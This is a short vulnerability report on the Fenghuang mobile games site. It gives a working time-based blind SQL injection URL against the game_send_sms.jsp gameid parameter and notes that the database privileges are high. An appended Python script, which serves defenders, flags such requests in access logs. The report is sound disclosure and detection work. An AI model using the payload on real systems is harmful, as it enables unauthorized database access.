Brief description:
The Fenghuang (凤凰) mobile games site has a blind SQL injection vulnerability in the form where a mobile phone number is entered to send a push link.

Details:
URL with the blind SQL injection:
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
The mysql system database is visible, so the user's privileges are probably quite high.
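
For defenders, the request shown above can be caught in web access logs. The following is an added example, not part of the original report: it URL-decodes each query string and flags a `gameid` that is not all digits or that contains a time-delay SQL function. The log lines are constructed, and treating `gameid` as a digits-only identifier is an assumption based on the URL in the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines (the second reuses the URL from the report).
SAMPLE_REQUESTS = [
    "GET /fenghuang/game/game_send_sms.jsp?gameid=130221346000&mo=1 HTTP/1.1",
    "GET /fenghuang/game/game_send_sms.jsp?gameid=130221346000"
    "%27%20and%20sleep%282%29%3d%27&mo=1 HTTP/1.1",
    "GET /fenghuang/game/index.jsp HTTP/1.1",
]

# Assumption: gameid is a plain numeric identifier, as in the report's URL.
NUMERIC_ID = re.compile(r"\A\d{1,20}\Z")
# Functions commonly used for time-based blind SQL injection probes.
TIME_DELAY = re.compile(r"\b(sleep|benchmark)\s*\(|waitfor\s+delay", re.I)


def check_request(line, numeric_params=("gameid",)):
    """Return a list of findings for one 'METHOD target PROTO' request line."""
    parts = line.split(" ")
    if len(parts) < 2:
        return ["malformed request line"]
    query = urlsplit(parts[1]).query
    findings = []
    # parse_qs percent-decodes values, so %27 and %28 become ' and (.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in numeric_params and not NUMERIC_ID.match(value):
                findings.append(f"{name}: non-numeric value {value!r}")
            if TIME_DELAY.search(value):
                findings.append(f"{name}: time-delay SQL function in value")
    return findings


def scan(lines):
    """Map each suspicious request line to its findings."""
    return {line: f for line in lines if (f := check_request(line))}


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS).items():
        print(line)
        for finding in findings:
            print("  ->", finding)
```

The same digits-only check belongs on the server before `gameid` reaches the database, together with a parameterized query.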